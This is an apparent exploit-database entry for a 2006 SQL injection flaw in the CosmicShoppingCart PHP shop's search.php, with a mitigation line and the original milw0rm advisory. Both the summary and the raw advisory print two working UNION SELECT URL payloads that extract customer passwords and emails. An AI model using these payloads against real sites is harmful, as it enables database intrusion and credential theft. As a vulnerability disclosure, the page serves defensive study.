header-logo
Suggest Exploit
vendor:
CosmicShoppingCart
by:
Vympel (Marcelo Almeida)
5.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: CosmicShoppingCart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: a:cosmicphp:cosmicshoppingcart
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

CosmicShoppingCart SQL Injection Vulnerability

SQL injections have been found in CosmicShoppingCart, a PHP/MySQL e-commerce system. These injections could be exploited by users to retrieve the passwords of the admin. Examples of the injections are: cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/* and cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Software: CosmicShoppingCart (www.cosmicphp.com)
Risk: Medium
Discovered by: Vympel (Marcelo Almeida)
Background: CosmicShoppingCart is a PHP / MySQL e-commerce system. It is a fully customizable, shopping cart designed.

SQL injections have been found, they could be exploited by users to retrieve the passwords of the admin.

Examples:
cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/*
cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--

# milw0rm.com [2006-05-28]

Navigation

Suggest Exploit

Services By CQR